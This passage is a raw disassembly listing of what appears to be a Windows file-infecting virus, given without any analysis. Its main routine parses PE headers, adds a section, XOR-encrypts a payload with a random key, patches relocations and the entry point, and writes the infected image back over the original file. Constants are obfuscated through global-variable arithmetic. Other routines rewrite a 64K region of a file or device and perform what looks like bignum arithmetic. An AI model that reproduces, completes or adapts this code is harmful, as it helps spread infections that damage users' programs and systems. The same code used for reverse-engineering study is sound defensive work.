cmp [ebp+eax+var_32006], 52h
jnz short loc_4434FE
mov eax, dword_44C12C
mov edx, dword_44C17C
add edx, eax
cmp byte ptr [ebp+edx+var_32010+1], 4Ch
jnz short loc_4434FE
mov edx, dword_44C1F4
add edx, dword_44C234
cmp byte ptr [ebp+edx+var_3200C+3], 33h
jnz short loc_4434FE
add eax, dword_44C158
cmp [ebp+eax+var_32011], 32h
jnz short loc_4434FE
mov [ebp+var_1174], 1
loc_4434FE: ; CODE XREF: sub_442F46+546�j
; sub_442F46+560�j ...
add [ebp+var_438], 14h
loc_443505: ; CODE XREF: sub_442F46+477�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_4433C2
loc_44351A: ; CODE XREF: sub_442F46+49C�j
cmp [ebp+var_1174], 0
jz loc_444422
lea eax, [ebp+var_31EC7]
mov [ebp+var_42C], eax
mov eax, [eax+3Ch]
mov [ebp+var_84C], eax
add eax, [ebp+var_42C]
mov [ebp+var_848], eax
cmp [ebp+var_1180], 0
jnz loc_4436EE
mov eax, [ebp+var_8]
mov [ebp+var_31F08], eax
mov edx, dword_44C1AC
sub edx, 5
cmp [eax+0D0h], edx
jz loc_4436EE
mov edx, [eax+0D4h]
mov [ebp+var_31F0C], edx
mov ecx, dword_44C11C
movsx edi, word_44C218
add ecx, edi
sub ecx, 0Ah
cmp edx, ecx
jz loc_4436EE
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F08]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F10], edx
mul edx
mov [ebp+var_31F14], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F1C], edx
mov eax, ecx
mov [ebp+var_31F18], eax
mov ecx, dword_44C138
add ecx, 4
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_31F1C]
mov edx, [ebp+var_31F20]
add eax, edx
mov edx, [ebp+var_31F0C]
add eax, edx
mov edx, [ebp+var_31F08]
cmp [edx+54h], eax
jbe loc_4436EE
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F2C], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F30], eax
mov eax, [ebp+var_31F2C]
mov edx, [ebp+var_31F30]
add eax, edx
mov [ebp+var_31F24], eax
mov [ebp+var_31F34], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, dword_44C1E4
add edi, dword_44C224
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F38], eax
mov eax, [ebp+var_31F34]
mov edx, [ebp+var_31F38]
add eax, edx
mov [ebp+var_31F28], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F24]
add edx, eax
push edx
mov edx, [ebp+var_31F28]
add edx, eax
push edx
call ds:dword_44A638
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F3C], eax
mov eax, 28h
mov ecx, [ebp+var_848]
movzx ecx, word ptr [ecx+6]
mov edi, dword_44C140
sub edi, 7
sub ecx, edi
mul ecx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_31F3C]
mov edx, eax
mov ecx, [ebp+var_31F40]
add [edx], ecx
loc_4436EE: ; CODE XREF: sub_442F46+609�j
; sub_442F46+627�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43EC87
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F24]
mov esi, edx
add esi, eax
push offset dword_44C81C
call sub_43E507
push eax
push esi
call ds:dword_4481F4
mov eax, dword_44C234
add eax, 1FFFCh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_43EC87
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, dword_44C204
add eax, 0C000003Fh
mov [esi+24h], eax
movsx eax, word_44C144
mov edx, dword_44C278
lea eax, [eax+edx+4]
push eax
mov eax, dword_44C210
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_44A644
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_43EC87
add esp, 30h
mov [ebp+var_10], eax
movsx eax, word_44C208
add eax, 1FFFBh
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call ds:dword_44BBAC
mov edi, dword_44C164
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, dword_44C248
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
movsx edi, word_44C130
movsx edx, word_44C0C0
add edi, edx
sub edi, 4
mov edx, [ebp+var_42C]
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call ds:dword_44BBAC
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F2C], edx
mov [ebp+var_31F28], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F2C]
mov [ecx+edi], dl
call ds:dword_44BBAC
movsx edx, word_44C260
add edx, dword_44C21C
sub edx, 9
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F34], edx
mov [ebp+var_31F30], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F34]
mov [ecx+edi], dl
mov eax, dword_44C0B4
add eax, 34h
movsx edx, word_44C178
add eax, edx
mov [ebp+var_43C], eax
jmp short loc_443901
; ---------------------------------------------------------------------------
loc_4438CC: ; CODE XREF: sub_442F46+9C7�j
call ds:dword_44BBAC
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F3C], edx
mov [ebp+var_31F38], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F3C]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_443901: ; CODE XREF: sub_442F46+984�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_4438CC
cmp [ebp+var_1180], 0
jz short loc_443990
mov eax, [ebp+var_8]
mov edx, [eax+34h]
add edx, [eax+28h]
mov eax, dword_44C17C
movsx ecx, word_44C1FC
add eax, ecx
sub eax, 3
add edx, eax
mov [ebp+var_31F40], edx
mov eax, [ebp+var_850]
add eax, dword_44C25C
mov edx, [ebp+var_4]
mov eax, [edx+eax]
mov [ebp+var_31F44], eax
movsx edx, word_44C250
mov ecx, dword_44C0DC
lea edx, [edx+ecx-5]
sub eax, edx
add eax, [ebp+var_31F40]
movsx edx, word_44C100
add edx, dword_44C1A8
dec edx
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov edx, [ebp+var_31F48]
sub edx, [eax+34h]
mov [eax+28h], edx
loc_443990: ; CODE XREF: sub_442F46+9D0�j
push 0Dh
push offset dword_44C2C0
lea eax, [ebp+var_31ED4]
push eax
call ds:dword_44A638
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED4]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_44A638
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
movsx edx, word_44C218
sub edx, 3
add eax, edx
mov [ebp+var_424], eax
jmp short loc_4439FC
; ---------------------------------------------------------------------------
loc_4439E2: ; CODE XREF: sub_442F46+AC5�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_4439FC: ; CODE XREF: sub_442F46+A9A�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_4439E2
mov eax, dword_44C1EC
sub eax, 8
mov [ebp+var_18], eax
mov eax, dword_44C1E8
dec eax
mov [ebp+var_440], eax
jmp loc_443C6A
; ---------------------------------------------------------------------------
loc_443A29: ; CODE XREF: sub_442F46+D34�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F44], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F48]
mov esi, edx
add esi, eax
mov eax, dword_44C184
add eax, dword_44C094
sub eax, 8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_443AC1
mov eax, dword_44C228
sub eax, 2
cmp byte ptr [ebx+eax], 72h
jnz short loc_443AC1
mov eax, dword_44C1CC
dec eax
cmp byte ptr [ebx+eax], 63h
jnz short loc_443AC1
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_443C64
; ---------------------------------------------------------------------------
loc_443AC1: ; CODE XREF: sub_442F46+B51�j
; sub_442F46+B5F�j ...
mov eax, dword_44C0D4
movsx edx, word_44C1FC
add eax, edx
sub eax, 0Bh
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_443B19
movsx eax, word_44C118
add eax, dword_44C17C
sub eax, 7
cmp byte ptr [ebx+eax], 65h
jnz short loc_443B19
mov eax, dword_44C0AC
add eax, dword_44C26C
sub eax, 5
cmp byte ptr [ebx+eax], 61h
jnz short loc_443B19
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1184], eax
jmp loc_443C64
; ---------------------------------------------------------------------------
loc_443B19: ; CODE XREF: sub_442F46+B90�j
; sub_442F46+BA6�j ...
mov eax, dword_44C094
mov edx, eax
sub edx, 6
cmp byte ptr [ebx+edx], 2Eh
jnz short loc_443B4A
movsx edx, word_44C218
sub edx, 4
cmp byte ptr [ebx+edx], 69h
jnz short loc_443B4A
add eax, dword_44C188
dec eax
cmp byte ptr [ebx+eax], 61h
jz loc_443C64
loc_443B4A: ; CODE XREF: sub_442F46+BE1�j
; sub_442F46+BF1�j
push ebx
push esi
call ds:dword_4481F4
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, dword_44C280
add eax, 8
push eax
mov eax, dword_44C198
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call ds:dword_44A644
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_43EC87
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, dword_44C0B8
sub eax, 2
cmp byte ptr [ebx+eax], 64h
jnz short loc_443C0D
mov eax, [ebp+var_31F40]
cmp [ebp+var_10], eax
jbe short loc_443C0D
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F4C], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_443C0D: ; CODE XREF: sub_442F46+CA5�j
; sub_442F46+CB0�j
movsx eax, word_44C250
movsx edx, word_44C180
lea eax, [eax+edx+0FFBh]
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_43EC87
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call ds:dword_44A638
add esp, 14h
loc_443C64: ; CODE XREF: sub_442F46+B76�j
; sub_442F46+BCE�j ...
inc [ebp+var_440]
loc_443C6A: ; CODE XREF: sub_442F46+ADE�j
mov eax, [ebp+var_848]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_443A29
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_443C8F: ; CODE XREF: sub_442F46+F90�j
mov eax, dword_44C134
movsx edx, word_44C150
add eax, edx
sub eax, 10h
mov [ebp+var_1C], eax
jmp short loc_443D01
; ---------------------------------------------------------------------------
loc_443CA5: ; CODE XREF: sub_442F46+DC1�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_443CC1
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_443CC1: ; CODE XREF: sub_442F46+D6E�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_443CFE
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_443D09
; ---------------------------------------------------------------------------
loc_443CFE: ; CODE XREF: sub_442F46+D94�j
inc [ebp+var_1C]
loc_443D01: ; CODE XREF: sub_442F46+D5D�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_443CA5
loc_443D09: ; CODE XREF: sub_442F46+DB6�j
mov eax, dword_44C15C
add eax, dword_44C154
sub eax, 10h
mov [ebp+var_428], eax
jmp loc_443E9C
; ---------------------------------------------------------------------------
loc_443D22: ; CODE XREF: sub_442F46+F62�j
mov eax, [ebp+var_428]
mov edx, dword_44C28C
movsx ecx, word_44C264
add edx, ecx
sub edx, 7
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F44], eax
mov ax, [eax]
mov word ptr [ebp+var_31F40], ax
movzx eax, word ptr [ebp+var_31F40]
mov edx, dword_44C224
add edx, dword_44C18C
sub edx, 5
cmp eax, edx
jz loc_443EAE
movzx edi, word ptr [ebp+var_31F40]
movsx edx, word_44C178
mov ecx, dword_44C1B0
lea ecx, [edx+ecx+1]
sar edi, cl
mov word ptr [ebp+var_31F48+2], di
movzx edi, word ptr [ebp+var_31F40]
movsx ecx, word_44C178
shl edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx edi, word ptr [ebp+var_31F40+2]
movsx edx, word_44C0D8
add edx, dword_44C12C
mov ecx, edx
sub ecx, 6
sar edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx eax, word ptr [ebp+var_31F40+2]
movsx edx, word_44C0B0
sub edx, 7
cmp eax, edx
jnz short loc_443DF6
mov eax, dword_44C18C
add eax, dword_44C0A0
sub eax, 4
cmp [ebp+var_428], eax
jnz loc_443EAE
loc_443DF6: ; CODE XREF: sub_442F46+E94�j
mov eax, [ebp+var_848]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F50], eax
sub eax, [ebp+var_31F4C]
mov [ebp+var_31F54], eax
movzx eax, word ptr [ebp+var_31F48+2]
movsx edx, word_44C1F0
movsx ecx, word_44C250
add edx, ecx
dec edx
cmp eax, edx
jnz short loc_443E8C
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F58], eax
mov edx, [ebp+var_31F54]
add [eax], edx
loc_443E8C: ; CODE XREF: sub_442F46+F19�j
movsx eax, word_44C178
sub eax, 2
add [ebp+var_428], eax
loc_443E9C: ; CODE XREF: sub_442F46+DD7�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_443D22
loc_443EAE: ; CODE XREF: sub_442F46+E21�j
; sub_442F46+EAA�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_848]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_443C8F
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1188], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
cmp [ebp+var_1180], 0
jnz short loc_443F19
add eax, 60h
mov edx, [ebp+var_848]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_848]
mov edx, [edx+68h]
add [eax], edx
loc_443F19: ; CODE XREF: sub_442F46+FB2�j
mov eax, [ebp+var_8]
mov edx, dword_44C09C
add edx, 4
movsx ecx, word_44C178
add edx, ecx
mov [eax+44h], dx
mov edx, dword_44C0EC
add edx, dword_44C0A8
sub edx, 2
mov [eax+1Ah], dl
mov edx, dword_44C1B8
add edx, dword_44C184
sub edx, 5
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EE0], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EE0]
add eax, [edx+1Ch]
sub eax, [ebp+var_1184]
mov [ebp+var_31EE4], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE8], eax
mov eax, [eax]
mov [ebp+var_1058], eax
mov eax, dword_44C0DC
sub eax, 3
mov [ebp+var_24], eax
jmp short loc_443FE6
; ---------------------------------------------------------------------------
loc_443FA5: ; CODE XREF: sub_442F46+10A6�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_443FE3
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_118C], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1194], edi
jmp short loc_443FEE
; ---------------------------------------------------------------------------
loc_443FE3: ; CODE XREF: sub_442F46+1079�j
inc [ebp+var_24]
loc_443FE6: ; CODE XREF: sub_442F46+105D�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_443FA5
loc_443FEE: ; CODE XREF: sub_442F46+109B�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1194]
add eax, [ebp+var_1058]
sub eax, [ebp+var_118C]
mov [ebp+var_1190], eax
mov eax, [ebp+var_848]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_4442F4
; ---------------------------------------------------------------------------
loc_44402F: ; CODE XREF: sub_442F46+13BA�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F40], edx
movzx ecx, byte ptr [edx+eax]
mov edi, dword_44C26C
add edi, 0E0h
cmp ecx, edi
jnz loc_444187
mov ecx, dword_44C1E8
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word_44C170
add edi, dword_44C1D0
sub edi, 9
cmp ecx, edi
jnz loc_444187
movsx ecx, word_44C0B0
sub ecx, 5
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, dword_44C090
movsx edx, word_44C174
add edi, edx
mov edx, edi
sub edx, 0Ah
cmp ecx, edx
jnz loc_444187
mov edx, dword_44C1E8
add edx, 2
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F40]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word_44C264
movsx edi, word_44C230
add ecx, edi
sub ecx, 0Fh
cmp edx, ecx
jnz loc_444187
movsx edx, word_44C100
inc edx
add eax, edx
mov edx, [ebp+var_31F40]
movzx eax, byte ptr [edx+eax]
movsx edx, word_44C260
sub edx, 2
cmp eax, edx
jnz loc_444187
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1188]
mov [ebp+var_31F48], eax
movsx eax, word_44C180
add eax, 0FFFFFFFBh
sub eax, [ebp+var_31F44]
add eax, [ebp+var_31F48]
mov edx, dword_44C274
inc edx
movsx ecx, word_44C0C0
add edx, ecx
sub eax, edx
mov [ebp+var_31F4C], eax
movsx edi, word_44C0C0
movsx edx, word_44C150
add edi, edx
mov edx, [ebp+var_C]
mov ecx, dword_44C238
inc ecx
add ecx, dword_44C0C8
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-28h], ecx
loc_444187: ; CODE XREF: sub_442F46+1107�j
; sub_442F46+112D�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F44], edx
movzx ecx, byte ptr [edx+eax]
movsx edi, word_44C1E0
mov edx, dword_44C128
lea edx, [edi+edx+0DCh]
cmp ecx, edx
jnz loc_4442F1
mov edx, dword_44C0A0
sub edx, 3
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word_44C24C
sub ecx, 9
cmp edx, ecx
jnz loc_4442F1
mov edx, dword_44C18C
movsx ecx, word_44C22C
add edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, dword_44C1E4
movsx edi, word_44C150
add ecx, edi
sub ecx, 0Ch
cmp edx, ecx
jnz loc_4442F1
mov edx, dword_44C210
movsx ecx, word_44C104
add ecx, edx
sub ecx, 6
mov edi, eax
add edi, ecx
mov ecx, [ebp+var_31F44]
movzx ecx, byte ptr [ecx+edi]
mov edi, dword_44C25C
sub edi, 8
cmp ecx, edi
jnz loc_4442F1
movsx ecx, word_44C250
lea edx, [edx+ecx+2]
add eax, edx
mov edx, [ebp+var_31F44]
movzx eax, byte ptr [edx+eax]
movsx edx, word_44C264
add edx, dword_44C17C
sub edx, 0Eh
cmp eax, edx
jnz short loc_4442F1
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_1190]
mov [ebp+var_31F4C], eax
mov eax, dword_44C1AC
add eax, 0FFFFFFFAh
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
movsx edx, word_44C178
add edx, dword_44C0A0
sub edx, 4
sub eax, edx
mov [ebp+var_31F50], eax
movsx edi, word_44C150
add edi, dword_44C09C
mov edx, [ebp+var_C]
mov ecx, dword_44C268
add ecx, dword_44C11C
sub ecx, 8
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-34h], ecx
loc_4442F1: ; CODE XREF: sub_442F46+1267�j
; sub_442F46+1290�j ...
inc [ebp+var_C]
loc_4442F4: ; CODE XREF: sub_442F46+10E4�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_44402F
push [ebp+var_1070]
call ds:dword_44A654 ; CloseHandle
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_4481F4
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_44432E: ; CODE XREF: sub_442F46+13ED�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44432E
mov [ebp+var_31ED8], eax
movsx edx, word_44C0A4
sub edx, 3
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED8]
mov edx, dword_44C23C
add edx, dword_44C154
sub edx, 0Ah
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED8]
movsx edx, word_44C1FC
movsx ecx, word_44C218
add edx, ecx
sub edx, 9
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, dword_44C0D4
sub eax, 6
push eax
push 2
push 0
movsx eax, word_44C1E0
movsx edx, word_44C1C0
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call ds:dword_44B788 ; CreateFileA
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_44BB8C ; WriteFile
push [ebp+var_1070]
call ds:dword_44A654 ; CloseHandle
push [ebp+var_4]
call ds:dword_44861C ; LocalFree
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_449364 ; CopyFileA
lea eax, [ebp+var_116F]
push eax
call ds:dword_446008 ; DeleteFileA
mov eax, 1
jmp short loc_444439
; ---------------------------------------------------------------------------
loc_444422: ; CODE XREF: sub_442F46+C3�j
; sub_442F46+DD�j ...
push [ebp+var_1070]
call ds:dword_44A654 ; CloseHandle
push [ebp+var_4]
call ds:dword_44861C ; LocalFree
xor eax, eax
loc_444439: ; CODE XREF: sub_442F46+5F�j
; sub_442F46+14DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_442F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44443E proc near ; CODE XREF: sub_43EE89+A8�p
; sub_43EE89+16B�p
var_1000C = dword ptr -1000Ch
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_444F6C
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, dword_449260
cmp [ebp+arg_4], 43h
jnz short loc_444463
lea edi, dword_4480F0
loc_444463: ; CODE XREF: sub_44443E+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call ds:dword_44B788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_44451D
push 0
push 0
push esi
push edi
call ds:dword_44BB9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_446028 ; ReadFile
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_4444B5: ; CODE XREF: sub_44443E+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4444B5
mov edx, dword_44C238
add edx, 1
movsx ecx, word_44C1C0
add edx, ecx
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, dword_44C0C8
add ebx, dword_44C258
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_1000C+1], edx
push 0
push 0
push esi
push edi
call ds:dword_44BB9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
movsx eax, word_44C264
sub eax, 5
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_44BB8C ; WriteFile
push edi
call ds:dword_44A654 ; CloseHandle
loc_44451D: ; CODE XREF: sub_44443E+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_44443E endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444524 proc near ; CODE XREF: sub_43BDC4+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_44DB28
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4445EF
xor edx, edx
loc_444554: ; CODE XREF: sub_444524+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_444566
mov edx, [ebp+arg_4]
call sub_444580
loc_444566: ; CODE XREF: sub_444524+38�j
lea edx, dword_44DB28
call sub_444580
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_444554
popa
pop ebp
retn 10h
sub_444524 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444580 proc near ; CODE XREF: sub_444524+3D�p
; sub_444524+48�p
lea edi, dword_44DAE8
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_44DB28
call sub_4445EF
